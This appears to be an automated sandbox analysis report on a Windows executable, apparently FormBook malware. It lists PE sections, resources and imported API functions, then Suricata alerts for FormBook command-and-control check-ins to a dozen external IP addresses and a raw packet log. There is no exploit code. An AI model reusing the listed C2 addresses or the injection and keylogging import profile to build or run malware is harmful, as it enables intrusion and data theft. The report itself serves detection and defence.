.text | 0x1000 | 0x9aa37 | 0x9ac00 | 17187df51446e12491449bc34d849147 | False | 0.5653003205775444 | data | 6.665680008888402 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb92 | 0x2fc00 | 8ab1e4a7788882b436d7b30c3a4c9b0c | False | 0.3529327552356021 | data | 5.692798211199345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x705c | 0x4800 | c69381d9330fec33b92360836b24215a | False | 0.043511284722222224 | DOS executable (block device driver @\273\) | 0.5845774219571381 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x61f88 | 0x62000 | 6fd00e699001d2969e71fb63de9e11d2 | False | 0.9332923110650511 | data | 7.905781149897465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x136000 | 0x75cc | 0x7600 | 40b4850993e12fb1b505490e48047c95 | False | 0.7645325741525424 | data | 6.798203799100818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x5924f | data | | | 1.0003313842825257
RT_GROUP_ICON | 0x135a08 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x135a80 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x135a94 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x135aa8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x135abc | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x135b98 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-18T16:18:05.577568+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53614 | 148.72.152.174 | 80 | TCP
2024-09-18T16:18:05.577568+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53614 | 148.72.152.174 | 80 | TCP
2024-09-18T16:18:21.156053+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53615 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:24.120594+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53616 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:26.381761+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53617 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:29.917543+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53618 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:29.917543+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53618 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:35.831964+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53619 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:38.680882+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53620 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:41.008552+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53621 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:43.557979+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53622 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:43.557979+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53622 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:49.784798+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53623 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:52.296428+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53624 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:54.881727+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53625 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:57.440579+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53626 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:57.440579+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53626 | 172.96.191.39 | 80 | TCP
2024-09-18T16:19:03.216710+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53627 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:05.792242+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53628 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:08.348795+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53629 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:11.055033+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53630 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:11.055033+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53630 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:17.368469+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53631 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:19.914771+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53632 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:22.516389+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53633 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:25.013615+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53634 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:25.013615+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53634 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:30.690959+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53635 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:33.214822+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53636 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:35.871779+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53637 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:38.348985+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53638 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:38.348985+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53638 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:43.847494+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53639 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:46.397678+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53640 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:48.946030+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53641 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:51.502607+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53642 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:51.502607+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53642 | 13.248.169.48 | 80 | TCP
2024-09-18T16:20:11.912872+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53647 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:14.674893+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53648 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:17.276409+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53649 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:19.922706+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53650 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:19.922706+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53650 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:26.996004+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53651 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:29.401854+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53652 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:32.377082+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53653 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:34.796371+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53654 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:34.796371+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53654 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:41.459514+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53655 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:44.006797+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53656 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:46.552932+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53657 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:48.479195+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53658 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:48.479195+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53658 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:54.781314+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53659 | 188.114.97.3 | 80 | TCP
2024-09-18T16:20:57.207720+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53660 | 188.114.97.3 | 80 | TCP
2024-09-18T16:20:59.708283+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53661 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:02.598834+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53662 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:02.598834+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53662 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:08.364978+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53663 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:10.922448+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53664 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:13.470593+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53665 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:16.091718+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53666 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:16.091718+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53666 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:38.233370+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53667 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:40.764371+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53668 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:43.352378+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53669 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:45.848266+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53670 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:45.848266+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53670 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:51.341563+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53671 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:54.000396+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53672 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:56.455893+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 53673 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:58.973358+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 53674 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:58.973358+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 53674 | 3.33.130.190 | 80 | TCP
                                                        Sep 18, 2024 16:19:19.914726019 CEST805363263.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:19.914771080 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:20.836221933 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.852466106 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.857481956 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:21.857561111 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.869117975 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.874005079 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:21.874131918 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.515882015 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.516226053 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.516388893 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:23.380784988 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.400724888 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.405807972 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:24.407202959 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.414429903 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.420156002 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013453007 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013533115 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013614893 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:25.016638994 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:25.021558046 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:30.043042898 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:30.047926903 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.048007011 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:30.063503981 CEST5363580192.168.2.591.184.0.200
